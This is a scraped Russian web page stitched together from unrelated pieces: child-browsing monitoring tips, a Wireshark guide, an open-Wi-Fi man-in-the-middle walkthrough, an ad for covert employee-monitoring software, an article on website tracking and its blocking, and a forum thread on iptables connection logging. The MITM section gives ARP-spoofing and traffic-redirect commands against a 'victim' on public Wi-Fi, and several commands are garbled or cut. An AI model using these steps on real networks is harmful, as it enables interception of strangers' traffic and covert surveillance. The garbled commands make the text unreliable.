Elettracompany.com

Компьютерный справочник
60 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как отследить через роутер посещаемые сайты

Как узнать, на какие сайты заходит ребенок?

На какие сайты заходит мой ребенок? Этот вопрос рано или позно задают себе все папы и мамы, чье чадо, заполучив вожделенный Windows-компьютер или планшет, принялось со всей активностью осваивать все просторы и закоулки всемирной Сети, или как сейчас модно говорить «серфить» в Интернете.

И эффективно проконтролировать виртуальные похождения своего дитяти может далеко не каждый родитель, в особенности если ребенок уже умеет удалять историю в браузере своего компьютера.

Скажем сразу, если ваши сын или дочь кое-чего уже научились, и по крайней мере знают, как правильно использовать функции приватных режимов просмотра в Internet Explorer (InPrivate browsing mode) или Google Chrome (Incognito mode), то история посещений (т.е. на какие сайты заходил ребенок и какие страницы на этих сайтах просматривал), в этих браузерах сохраняться не будут.

Если же до такого ваш ребенок еще не додумался, и его не надоумили на это более продвинутые в техническом плане друзья, то проверить, на какие сайты он заходил, можно путем просмотра DNS кэша его ПК. Для это в командной строке устройства нужно набрать ipconfig /displaydns и нажать Enter.

Данная команда позволяет оперативно получить перечень всех сайтов, на которые заходили с данного конкретного компьютера. Следует иметь в виду, что в списке буду содержаться не только те веб-страницы, на которые были прямые заходы с ПК вашего ребенка, но также косвенно доступный через такие страницы контент .

Таким контентом могут быть, к примеру, реклама или объявления сомнительного содержания, которые размещались на вполне приличных и безобидных сайтах. В этой связи, прежде чем выдвигать какие-либо обвинения, следует грамотно разобраться с полученной информацией.

Страницы, на которые были прямые заходы с ПК в списке, полученном через команду ipconfig /displaydns, отображаются как правило с знакомым всем «www.», однако не всегда.

Более надежный, но несколько более сложный способ мониторинга онлайн-деятельности вашего ребенка состоит в том, чтобы настроить ваш домашний роутер на сохранение его собственных логов через систему SysLog. Это позволит сохранять историю посещений всех подключенных к вашей домашней сети компьютеров (смартфонов и планшетов), притом записи нельзя будет удалить просто так, без административного доступа к вашему роутеру.

Функция SysLog предусмотрена практически в каждом современном маршрутизаторе, одна для ее эффективной реализации необходимы определенные знания, к тому же в разных моделях роутеров настраивается она по-разному. Тем не менее, в некоторых случаях необходимость понимать, на какие сайты ходит ребенок, и более жестко контролировать его онлайн-прогулки стоит того, чтобы почитать инструкцию к роутеру и озадачить поисковик на предмет пошаговой настройки SysLog для данной модели.

Чуть более простой вариант мониторинга веб-серфинга — это такие сравнительно несложные в использовании онлайн-сервисы как, к примеру, OpenDNS, позволяющие предотвращать доступ пользователей одного или нескольких компьютеров к нежелательному содержимому сайтов, защищать компьютеры от вирусов, распространяемого через интернет, получать релевантны результаты поиска по интернету при запросе несуществующего адреса сайта или сайта, временно недоступного из-за сбоев, и пр. Однако об OpenDNS мы расскажем в одной из следующих статей.

Идеальный способ узнать какие сайты Вы посещаете через открытый WiFi

Установка и запуск WireShark

WireShark — это крайне полезная и мощная программа для перехвата трафика и анализа активности в локальных сетях. В Kali Linux эта программа уже установлена и готова к использованию, а в Windows её нужно установить дополнительно ( версия для windows ).

Если в Вашем линуксе программа не установлено, то её можно установить из менеджера пакетов или в терминале командой

sudo atp-get install wireshar

Для запуска воспользуемся терминалом и запустим от имени Супер-пользователя.

Выбираем нужный нам интерфейс для анализа трафика. После выбора интерфейса мониторинга вид программы меняется

Прежде чем начать смотреть трафик в сети, попробуйте на себе. Перехватите Ваш трафик из Вашего браузер. Просто посетите несколько страница на ПК где запущен WireShark и посмотрите результат. Разберите пакеты, проанализируйте их содержимое.

Wireshark — Мощное средство, а сетевая активность может быть большой. По-этому в интерфейсе программы может оказаться 1000 записей. Для фильтрации можно использовать следующие параметры:

1. ip.proto — Сортировка по протоколу
2. ip.src — сортировка по отправителю
3. ip.dst — сортировка по получателю
4. ip.addr — сортировка по адресу

Между названием фильтра и значением нужно поставить логический символ. Условия можно объединять

== — равно
|| — или то или это (логическое или)
& — и то и то (логическое и)
> — больше
sudo netdiscover

Читать еще:  Как поставить видео в презентацию powerpoint

Такая, примерно, картина у Вас должна получиться.

Если список активных клиентов большой (например вы сидите в макдональдсе) можно список сохранить в файл, правда уже другой программой — fping.

fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt

Результат выполнения окажется в файле hosts_active.txt.

IP адреса нам нужны для подстановки в программу Wireshark, а именно в фильтры. Пример фильтра:

IP-адреса могут меняться при переподключении. Тогда фильтруем по MAC-адресу:

Никто не запрещает комбинировать фильтры:

Атака «Человек посередине»

В англоязычной литературе данная атака называется MITM. Суть этой атаки заключается в следующем — когда клиент подключается к серверу, то открывается канал связи и клиент доверяет и думает, что сервер настоящий. Перехватчик выступает транслирующим звеном и говорит клиенту «я настоящий сервер», а серверу — «я настоящий клиент». Тем самым транслирует трафик одного другому.

Чтобы реализовать у себя такую схему подключения мы выполним следующие команды.

sudo cat /proc/sys/net/ipv4/ip_forward #check forwarding packets, 1-on, 0-off

Если вывелось 1, то следующую команду пропустите

echo «1» > /proc/sys/net/ipv4/ip_forward #enable forwarding packets

Допишем несколько правил в сетевые настройки

sudo bash iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8282 #Redirecting traffic from 80 ports to 8282

iptables -t nat -A PREROUTING -p tcp —destination-port 443 -j REDIRECT —to-port 8282 #Redirecting traffic from 443 ports to 8282

Стартуем команду для перехвата трафика жертвы. Сначала запускаем wireshark, а лишь потом команду:

arpfpoof -i -t где, жертва — ip-адрес жертвы, шлюз — ip-адрес роутера

Например, для атаки на жертву с ip-адресом 192.168.0.100, а роутером 192.168.0.1 команда примет вид:

arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1

Завершающую работу по анализу перехваченных данных производим в программе wireshark.

Заключение

Если вы подключаетесь к открытым wifi сетям, то будьте очень внимательны при переда данных в них. Используйте зашифрованное соединение и другие методы защиты.

*Статья ни в коем случае не призывает к действиям, а лишь демонстрирует возможности программного обеспечения!

Как отследить через роутер посещаемые сайты

LanAgent покажет что происходило на компьютерах сотрудников: посещение развлекательных сайтов, переписку с конкурентами, выполнение «левых» работ в рабочее время, распространение негатива о своей компании.

Помимо информации о совершенных действиях, в вашем распоряжении будут снимки экранов мониторов пользователей, запись видео/звука с веб камеры компьютера, копия всех передаваемых с компьютера данных.

LanAgent обеспечивает контроль каналов передачи данных (внешние накопители, электронная почта, мессенджеры, соц. сети, печать документов на принтер, и другие).

Поможет обнаружить подозрительные действия пользователей: активную переписку с конкурентами или уволенными сотрудниками, отправку важных файлов, передачу персональных данных (номеров телефонов, паспортных данных, номеров банковских карт, …).

Функция «конфиденциального каталога» позволит ограничить доступ к важным данным. Например, запретить их копирование клиентской базы за пределы защищаемого каталога и вывод на печать, позволив при этом по прежнему с ней работать

LanAgent представит наглядные отчеты по опозданиям и ранним уходам сотрудников, произведет учет РЕАЛЬНОГО времени работы пользователей, покажет не просто, сколько времени компьютер был включен, а время активной работы, простаивание компьютеров, время начала и окончания работы на ПК.

Все нарушения трудовой дисциплины будут видны в специальном сводном отчете.

Кроме работы компьютера, учет можно произвести и исходя из времени активной работы пользователей в программах. По такому отчету можно легко увидеть, был ли сотрудник действительно занят работой или провел значительную часть дня общаясь в соц. сетях.

LanAgent Standard – программа для скрытого наблюдения за компьютерами в локальной сети. Предназначена для контроля действий пользователей и защиты конфиденциальной информации от утечек. Осуществляет контроль и мониторинг активности на любом компьютере, подключённом к сети вашей организации. Программа позволит выявить деятельность, не имеющую отношения к работе, покажет, насколько рационально ваши сотрудники используют рабочее время.

LanAgent – Ваш инструмент для выявления утечек важной информации, а также фактов ведения переговоров с конкурентами. Узнать больше

LanAgent Enterprise – легко масштабируемый инструмент для наблюдения за компьютерами служащих в локальной сети. Является эффективным средством для обеспечения информационной безопасности. LanAgent Enterprise также имеет все необходимые функции для контроля персонала организации.

Основное отличие Enterprise от версии Standard состоит в том, что Enterprise является полноценным инструментом для защиты конфиденциальной информации и лучше подойдет для организаций, в которых требуется не просто мониторинг, а именно планомерное обнаружение и предотвращение утечек информации. Узнать больше

Программа LanAgent EnterpriseDLP – по сравнению с Enterprise имеет расширенный поисковый модуль, для поиска ключевых слов и регулярных выражений (номер телефонов, паспортные данные, и т.д.) во всех собранных данных, в том числе в напечатанных документах и вложениях почты.

Читать еще:  Powerpoint на айпад

Также, EnterpriseDLP позволяет управлять доступом к конфиденциальным файлам на контролируемых компьютерах. Узнать больше

LanAgent Terminal – легко масштабируемый инструмент для слежения за действиями пользователей терминальных клиентов.

LanAgent Terminal имеет значительную часть возможностей версии LanAgent Enterprise, таких как: подключение нескольких рабочих мест специалиста безопасности, распределение прав на просмотр информации, отправка уведомлений о нарушениях политик безопасности на ICQ и E-mail, подписка на оповещения по данным событиям, встроенный планировщик отчетов, . И предназначен для использования на технологии терминал-сервер (на основе Win 2003/2008/2012 Server). Узнать больше

Как сайты следят за своими посетителями?

Многие владельцы сайтов встраивают в свои веб-страницы разнообразные скрипты, отслеживающие действия пользователя. Как правило, подобные инструменты применяются для оценки посещаемости сайта и выяснения предпочтений пользователей. Однако некоторые разработчики идут дальше и пытаются отслеживать все действия посетителей в Интернете. Как сайты следят за нами? Что можно сделать, чтобы данные не попали к посторонним?

Зачем за нами следят?

Для начала кратко ответим на вопрос – зачем владельцы сайтов следят за посетителями? Чаще всего это делается для рекламирования тех или иных товаров и услуг. Крупные сайты продают специалистам по рекламе данные о поисковых запросах пользователей, используемых браузерах и операционных системах. Полученные сведения используются для показа контекстной рекламы, выработки маркетинговых стратегий и т.д. Иногда данные могут продаваться и создателям вредоносного ПО – на основании данных о распространенности различных браузеров и операционных систем среди пользователей можно понять, в каких версиях веб-обозревателей стоит искать уязвимости. В ряде случаев вообще невозможно понять, зачем сайты собирают информацию о посетителях.

Технологии слежки

Каким образом владельцы сайтов отслеживают активность посетителей? Существуют разные способы слежки. Некоторые из них вполне очевидны и безвредны, другие – «на грани фола». Рассмотрим популярные способы.

Cookie (куки)

Куки — один из простейших и самых известных способов сбора данных о посетителе. Это небольшие фрагменты информации, посылаемые сервером, – они хранятся на устройстве посетителя. В них могут содержаться аутентификационные данные, статистика заходов на страницу, настройки сайта. Сами по себе куки неопасны и используются миллионами полезных сайтов. Однако недобросовестные разработчики сайтов могут собирать слишком много информации о посетителе. К счастью, куки можно отключить, но надо помнить, что многие сайты без них работают некорректно.

Следящий пиксель

Следящий пиксель – техника, позволяющая оценить количество заходов на страницу. В код страницы встраивается прозрачное изображение размером в 1 пиксель. Когда браузер пользователя загружает страницу, он также подгружает и этот прозрачный пиксель. В результате срабатывает запрос к тому веб-серверу, где расположена незаметная картинка. Веб-сервер при получении запроса записывает в лог IP-адрес пользователя, загрузившего крохотную картинку. Таким образом владелец сайта получает данные о посетителях, загружавших ту или иную страницу.

Счетчики и метрики

С помощью различных счетчиков и метрик, таких как Google Analytics и Яндекс.Метрика, можно получить не только сведения о браузере и ОС пользователя, но и примерные данные о его местоположении (если не используется VPN, Tor и т.п.), возрасте и интересах.

Цифровые отпечатки браузера (фингерпринтинг)

Например, с помощью подмены HTML-элемента canvas владелец сайта может получить информацию об операционной системе пользователя, используемом браузере, разрешении экрана и т.п.

Скрипты рекламных сетей, социальные кнопки на сайтах

С их помощью также можно получить немало информации о посетителе, начиная от используемого браузера и заканчивая адресом странички в социальной сети. Разумеется, такое «подглядывание» может действовать не только в пределах одного веб-ресурса: практикуется и межсайтовое отслеживание действий пользователя.

Скрипты повторения сеанса, записывающие все действия пользователя

Способ трудоемкий, но он позволяет получить подробную информацию о каждом посетителе. Недобросовестные разработчики могут таким образом считывать пароли пользователей, записывать текст, введенный в формы на сайте (даже если данные не были отправлены), и т.п.

Существуют и другие способы получения данных о пользователе. Они имеют разную сложность и эффективность, однако объединяет их одно – разными способами разработчики сайтов незаметно получают данные о посетителях, чтобы распоряжаться информацией самостоятельно или продать ее.

Защищаемся от слежки

От многих способов наблюдения можно защититься.

Избавиться от нежелательного наблюдения помогут специальные расширения для браузеров, блокировщики рекламы, качественные антивирусы. Ни одно из имеющихся средств не может гарантировать стопроцентного результата, но все равно защита от излишне любопытных веб-разработчиков весьма полезна и эффективна.

Перечислим некоторые наиболее простые способы защиты.

Использование расширений, блокирующих рекламу

Например, uBlock Origin, Adblock Plus и других. Хотя основная их функция – отключение рекламы, эти расширения также блокируют следящие скрипты.

Использование браузерных плагинов, защищающих от слежения

К ним относятся Privacy Badger, Ghostery и т.д. Их основная задача как раз и заключается в блокировке разнообразных трекеров, собирающих данные о пользователях.

Читать еще:  Как убрать белый фон в powerpoint

Использование защиты от слежения, встроенной в антивирусный продукт

Здесь выбор поистине огромен – сейчас почти все популярные антивирусы имеют модули, защищающие от слежки при посещении сайтов.

Ручное изменение hosts-файлов

Изменение hosts-файлов позволит перенаправлять попытки соединения с небезопасными и шпионящими сайтами на немаршрутизируемый адрес 0.0.0.0 или в localhost. Например, можно воспользоваться hosts-файлом от проекта MVPS, в нем указан перечень шпионящих сайтов и ресурсов, распространяющих вредоносные программы. Отметим, однако, что антивирусы могут блокировать попытки ручного изменения hosts-файлов, и вообще коррекцию системных файлов стоит производить осторожно, только если вы понимаете, что делаете.

Нельзя не заметить, что и сами браузеры все лучше защищают пользователей от слежки. Речь идет не только о встроенном во все популярные веб-обозреватели режиме приватного просмотра. Так, например, команда Firefox уже приступила к бета-тестированию новой защиты от слежения, которая будет встраиваться в браузер. Возможно, примеру Firefox в ближайшем будущем последуют и другие браузеры.

Итак, от слежения в Интернете вполне можно защититься. Впрочем, существует немало сайтов, использующих куки и различные метрики только для сбора обезличенной статистики и предоставления посетителям более удобных сервисов. Сайты добросовестных разработчиков можно и нужно добавлять в исключения различных плагинов-блокировщиков.

Роутер. Писать лог посещенных сайтов клиентами

Здраствуйте
Стоит задача писать в лог посещенные клиентами сайты.
Сервер это роутер Asus rt-n66u. Достаточно знать какой ip на какой ip. ходит. Веб морда не нужна.
В принципе могу проинсталировать пакет, но вопрос какой?

Я пробовал
netstat -antup
но в обычном линуксе вывод человеческий,
В роутере фигня, ключ -р он не знает
Куда рыть?

Прошивка merlin последняя для моей модели

Когда начал читать, думал, что понял про что речь. Но дочитав до netstat споткнулся. Мне не понятно, какой вывод от netstat вы ожидали получить на маршрутизаторе? Да ещё с ключём ″u″ (udp), если речь идёт о сайтах, а не о DNS/торрентах.

Ну если достаточно только ip и вы готовы сами разгребать данные, то создайте в iptables ″-j LOG″ правило, которое будет записывать все исходящие tcp-пакеты с состоянием ″NEW″. Но не понятно, на чём в хотите это обрабатывать, данных будет много, их обычно складывают в БД, но не будете же вы ставить на Asus какую-нибудь СУБД?

прокся тебе нужна прозрачная. но не уверен что на роутер ее можно поставить.

Стоит задача писать в лог посещенные клиентами сайты.

Сервер это роутер

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами.

Посмотрите в сторону transparent proxy.

Вот с iptables прошу уточнить. Грэпать и искать я умею, удалять все что свыше 1000 строк или по крону тоже смогу. Да хоть в архив. Меня интересует только кто с кем соединялся, (Если будет легко, добавлю еще — когда соединялся). Вся остальная статистика не будет записываться
Будьте добры, бросьте линк на инструкцию iptables ″-j LOG″ правило/мануал на любом языке. С ходу не нарыл

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами

Нет, не сдохнет, нагрузка на него в принципе не большая, логи я могу хранить подсоединив к ЮСБ диск или флешку любого размера. Удаление, архивирование мне тоже помогут. Запись будет лишь факта установления соединения

tcpdump можно поставить и писать в лог первые 50-60 байт от IP пакетов, чтоб заголовки HTTP запросов сохранялись

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами.

Наверняка можно заставить iptables гнать лог на отдельную машину. Префикс, netcat, вывод в файл сокета вместо /var/log/messages.

man iptables. Базовое правило будет что-то типа этого:

iptables -I FORWARD —ctstate NEW -j LOG

Это будет логирование попыток установления соединения (то есть кто и куда пытался подключиться, но не факт, что получилось).

Можно попробовать логировать первый ответный пакет соединения, если он есть, значит точно подключение было:

iptables -I FORWARD -m connbytes 1:1 —connbytes-dir reply —connbytes-mode packets -j LOG

но не знаю, есть ли у вас connbytes в iptables.

Ну далее можно давать этим правилам дополнительные условия, чтобы, допустим, только tcp-протокол. Но, это именно будут ip-адреса, а не URL.

Ну и там указываете log-level и настраиваете запись логов в отдельный файл или по сети http://unix.stackexchange.com/questions/96484/how-can-i-configure-syslog-conf.

задача выглядит неадекватно, но мне нравится вариант с tcpdump, ибо можно гибко настроить фильтры и ротацию

Ссылка на основную публикацию
ВсеИнструменты 220 Вольт
Adblock
detector